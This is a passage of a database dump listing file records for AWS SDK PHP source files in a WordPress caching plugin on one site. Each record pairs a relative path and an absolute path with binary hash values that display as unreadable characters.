','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/TimestampShape.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/TimestampShape.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϗ؋)ѣ \r','NeqE.lǙy=>Nhbd','',0,'?'),('6\r\"ްzV.RY7^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Validator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Validator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C\\E9ͥxc\Z','>zA7cgŢ\rj k %ӂj','',0,'?'),('8mw@As:dN','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGateway/ApiGatewayClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGateway/ApiGatewayClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','})33\':X^!x','m\0(HqR\ZMܐO&','',0,'?'),('rO}M\"','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGateway/Exception/ApiGatewayException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGateway/Exception/ApiGatewayException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')v\r\\m\rI3J','GV\\ܨ|e @_3բBn','',0,'?'),('7Dx_BF.U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayManagementApi/ApiGatewayManagementApiClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayManagementApi/ApiGatewayManagementApiClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rd;E`[5 7c)f','01Y֎Wqu 䩫>Q!j','',0,'?'),('~|[\n(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayManagementApi/Exception/ApiGatewayManagementApiException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayManagementApi/Exception/ApiGatewayManagementApiException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ba{hĹ6_','$qkoݳSy]\Z+f֐','',0,'?'),(' ǰ-P6R','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayV2/ApiGatewayV2Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayV2/ApiGatewayV2Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӝk-IDlP˱','xL=^H-#s:HԵmh','',0,'?'),(' Ncۛ7p#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayV2/Exception/ApiGatewayV2Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayV2/Exception/ApiGatewayV2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N =%\'eva%','&>NHt~\'# C-3p[jM6vvom','',0,'?'),('e(tE','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppConfig/AppConfigClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppConfig/AppConfigClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3#32_c','AaF\Z\0^8p<֧r','',0,'?'),('bgI/.v@d','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppConfig/Exception/AppConfigException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppConfig/Exception/AppConfigException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' G|3bJt','w-.&p@e%߂','',0,'?'),('i#62;#$9|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppIntegrationsService/AppIntegrationsServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppIntegrationsService/AppIntegrationsServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2uamh4I','\niQ!]ix+fG/zQj%EZ7p','',0,'?'),('89O@|cѸ0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppIntegrationsService/Exception/AppIntegrationsServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppIntegrationsService/Exception/AppIntegrationsServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rifPCZ','Gij/|=\rޝ66.5X','',0,'?'),('>\ry%3dE','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppMesh/AppMeshClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppMesh/AppMeshClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' i%wFunjv','bh9#[%~M.\nK','',0,'?'),('h B!iH\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppMesh/Exception/AppMeshException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppMesh/Exception/AppMeshException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8E9WLV6/|\0-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRegistry/Exception/AppRegistryException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRegistry/Exception/AppRegistryException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y/M\Z?um','i;;is_:[mz-1h)','',0,'?'),('_t9Is0=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRunner/AppRunnerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRunner/AppRunnerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x+CuO;4J:!',' ֙XI:n&e2K\Zl=4V','',0,'?'),('O-j5&k','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRunner/Exception/AppRunnerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRunner/Exception/AppRunnerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǩpb~yFzz',' .4Ѫ3ڬ 0+','',0,'?'),('t6`p x/s','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppSync/AppSyncClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppSync/AppSyncClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2+ C-','tȐUKv?Ne','',0,'?'),('`T.POU[W($','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppSync/Exception/AppSyncException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppSync/Exception/AppSyncException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zT`h}','ji ٗh{^֡)&[DtKƉ+\r','',0,'?'),('szCh\0{3T#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appflow/AppflowClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appflow/AppflowClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','縣:o׈H','#H(=dp>6\"F','',0,'?'),(';w*^4Gc','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationInsights/ApplicationInsightsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationInsights/ApplicationInsightsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?hwOJ)','2AQEIe ͂컨E`pBρ','',0,'?'),('-Y ѱ<#&.3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationInsights/Exception/ApplicationInsightsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationInsights/Exception/ApplicationInsightsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZI(ZekB}^','v*`yز+~sûlRK&`','',0,'?'),('Lx\"8Op','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appstream/AppstreamClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appstream/AppstreamClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A0<.,','/-k#xv\r \0wn[\Z','',0,'?'),('e/¢O ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appstream/Exception/AppstreamException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appstream/Exception/AppstreamException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O=_q;otBxzc','C)ABL<\"\nAV1XQ{x','',0,'?'),('Oh/#9g‽','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/AccessPointArn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/AccessPointArn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A0 k㹋','T#ZxvuG˼PFZA. ]4','',0,'?'),('6\\]پ@)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/AccessPointArnInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/AccessPointArnInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R|p','c/V(~dӦž9r|YTI','',0,'?'),('U8;_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/Arn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/Arn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jvK4Kz','iK?cDQP5\r1fu]y','',0,'?'),('/U@ ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ArnInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ArnInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z^ሥNҲK# C','OxhVZrumL@xdV','',0,'?'),('\r.e;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ArnParser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ArnParser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\"PE','Wֳ33O^e/BJX','',0,'?'),('{p5Q3H\"KA','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/Exception/InvalidArnException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/Exception/InvalidArnException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 늰^, Q','p t,0{f\nKmT%+|J','',0,'?'),('09+DYЏ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ObjectLambdaAccessPointArn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ObjectLambdaAccessPointArn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$;xȌFnH','ˑ$~QMjyҀ','',0,'?'),('kvjX$]JA','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ResourceTypeAndIdTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ResourceTypeAndIdTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\">2&`','\'#ئW\na\r?ӂZ$','',0,'?'),('tb։\'Umr','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/AccessPointArn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/AccessPointArn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O\'6{ab',' ##>[n6PEO,e Msvb','',0,'?'),('F].jj','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/BucketArnInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/BucketArnInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' .Q4','tFFalb䯞+2hz!>k','',0,'?'),(' 4#*\Zy=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsAccessPointArn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsAccessPointArn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WRujTvJ<,',',1a9/\n~k }vz!Th P]','',0,'?'),('i>>XI8}ђ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsArnInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsArnInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B8sb![ΎEI\r',' S.c5\\aE7Qe','',0,'?'),('/lXᎬ9r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsBucketArn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsBucketArn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʹҡT+NR*ȽrM','A\r;U%)U4 eL72!\Zu','',0,'?'),('j3i?\Zr_twm=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Athena/AthenaClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Athena/AthenaClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','> E4\rx','|=~>/AdfV\ZǏ\rq+.*','',0,'?'),('4Jd5Z>eG','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Athena/Exception/AthenaException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Athena/Exception/AthenaException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$C )US;','>SE)^&\Z|j,r/','',0,'?'),(' @ R*_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AuditManager/AuditManagerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AuditManager/AuditManagerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q,{GU)','t)p%OԄ\'HPLS۰ȋv@;ϐ','',0,'?'),('a󏞺pz{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AuditManager/Exception/AuditManagerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AuditManager/Exception/AuditManagerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' & 1g','c~Zu\"z>5Y|2\n]6','',0,'?'),('j7=k[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AugmentedAIRuntime/AugmentedAIRuntimeClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AugmentedAIRuntime/AugmentedAIRuntimeClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ev13o*?p\r;','G손+Iچ7_J_u ~w ,','',0,'?'),('^0tǁJᢽH','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AugmentedAIRuntime/Exception/AugmentedAIRuntimeException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AugmentedAIRuntime/Exception/AugmentedAIRuntimeException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Z>Ϩj [','6C׾\\A\"xSw\Zn ','',0,'?'),('@\rg','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScaling/AutoScalingClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScaling/AutoScalingClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w9rwI','e쎣MSs3Nxq5rnx#','',0,'?'),('%j7^q{JG','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScaling/Exception/AutoScalingException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScaling/Exception/AutoScalingException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Td8$-','ɓ0P-\"編Ў<ԝ','',0,'?'),('bj[i#)m ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScalingPlans/AutoScalingPlansClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScalingPlans/AutoScalingPlansClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O$ƽpXy','+\r,(ld\rXW6}0su ','',0,'?'),('9\",oIb͂','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScalingPlans/Exception/AutoScalingPlansException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScalingPlans/Exception/AutoScalingPlansException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@bpg d!?','ks{AJc $*\ZQ@v[D}&','',0,'?'),('z~oIήW ܑ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c݄t\'(}','}qEZ-/E.-Sw/u)x','',0,'?'),('gb#-UpjpQ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClientInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClientInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.<7GL=wj`','vl\05 =ҒmRQhnJ','',0,'?'),('ZK-sQ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClientTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClientTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iR\r3\"/ձ','ȉm1\0!Y6wԹ&\nL (','',0,'?'),('յ7\0~^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Backup/BackupClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Backup/BackupClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D9ND{k','Հo$\"^ Ǚ=sb-J','',0,'?'),('m\no1V\'HF;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Backup/Exception/BackupException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Backup/Exception/BackupException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x~H=zqXU','CAeWLtY \Z[\Z','',0,'?'),('K2/kEtat','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Batch/BatchClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Batch/BatchClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gSip(c[','P:hᯟʋT꣬mt4>','',0,'?'),('L\Zn% 4$s','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Batch/Exception/BatchException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Batch/Exception/BatchException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a.5ԧaAstU','kYQ\\TGcb]б/,n@x','',0,'?'),('KF5=6!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Braket/BraketClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Braket/BraketClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h.(}͌','rj!utY{(8M~1Ȧm+Ǯ.','',0,'?'),('FWD/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Braket/Exception/BraketException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Braket/Exception/BraketException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j>w\ZIJnP}^ڕMTёO&ul_','',0,'?'),('!Ѐ<,','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Chime/Exception/ChimeException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Chime/Exception/ChimeException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#?XgwC$\\]G',']1qx\np;JfՁΠGъfBS','',0,'?'),('1s:d\0\ns*','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientResolver.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientResolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~sDaX.͊\n2',' . r[\ZЭ>h;-t;!','',0,'?'),('Taa`R(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/AbstractMonitoringMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/AbstractMonitoringMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_V!Wў96(t','%ie_D}suf:','',0,'?'),('L՛?,2hV','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ApiCallAttemptMonitoringMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ApiCallAttemptMonitoringMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j {18q','=u](C:]@[aCrL','',0,'?'),('MߗW1As-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ApiCallMonitoringMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ApiCallMonitoringMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j?-{씪ݤ','2DbRrRHּJFax','',0,'?'),('p,.Q','oWjZD.XUu:&6\nS','',0,'?'),('jZj]Q=d^L','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ConfigurationInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ConfigurationInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^#R 5h','ˈ7Wm%)|nr@','',0,'?'),('UѮ\r8ʚ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ConfigurationProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ConfigurationProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FS-H~& ','Ws\'ND/<','',0,'?'),('#-=וWG#u','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/Exception/ConfigurationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/Exception/ConfigurationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T͟yE)^','A2t(nYF8vdg}az[Y','',0,'?'),('!ha.7w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/MonitoringMiddlewareInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/MonitoringMiddlewareInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5XQ*̓','CZA7\nGَY%.Ӿm…ԛ/','',0,'?'),('jԶ~\n\"_\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Cloud9/Cloud9Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Cloud9/Cloud9Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\'iݮSr]|g','xֺ8}zP3\n͈D@','',0,'?'),('wκ7C#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Cloud9/Exception/Cloud9Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Cloud9/Exception/Cloud9Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J=Wp>%r>Z[','t^e[ӇΤYIs2o##$et','',0,'?'),('L MlhOIY','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudDirectory/CloudDirectoryClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudDirectory/CloudDirectoryClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1^ J)][v','7MU0`ze \ZDm2G|}[4؀','',0,'?'),('0w:2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudDirectory/Exception/CloudDirectoryException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudDirectory/Exception/CloudDirectoryException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NYDC[B\"n`{','<\\;T(K\Z\0`S|Α{th\r','',0,'?'),('}Th*֡*','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFormation/CloudFormationClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFormation/CloudFormationClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\\JW_ur','E{1a3VXmK;','',0,'?'),('ۣ@qUd6','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFormation/Exception/CloudFormationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFormation/Exception/CloudFormationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',LK9SYP','kwIfL$$4Zk+ļU[','',0,'?'),('ԁQѭ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/CloudFrontClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/CloudFrontClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.!!Z 